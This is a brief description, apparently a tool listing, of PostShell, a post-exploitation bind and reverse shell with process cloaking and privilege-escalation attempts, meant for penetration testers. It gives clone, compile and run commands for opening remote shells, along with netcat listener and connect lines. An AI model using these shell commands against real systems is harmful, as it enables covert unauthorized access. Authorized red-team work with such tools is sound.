PostShell is a compact post-exploitation shell offering both bind and backconnect modes with full TTY support and process cloaking for stealthy remote access.
PostShell - Post Exploitation Bind/Backconnect Shell
This tool is designed for penetration testers and red team operators to maintain stealthy and flexible remote access on compromised Unix-like systems. It enables interactive shell sessions that bypass common dependency requirements and adapts to network restrictions by supporting both bind and backconnect shells.
PostShell requires compilation on a Unix-like system and should be used with caution as it attempts to escalate privileges and cloaks its presence, which may trigger security alerts. Operators should ensure proper legal authorization before deployment.
git clone https://github.com/rek7/postshell
cd postshell
sh compile.sh
./stub 127.0.0.1 13377
Starts a backconnect shell connecting to IP 127.0.0.1 on port 13377
./stub 13377
Starts a bind shell listening on port 13377
nc -vlp port
Listens for incoming backconnect shell connections on specified port using netcat
nc host port
Connects to a bind shell running on the target host and port using netcat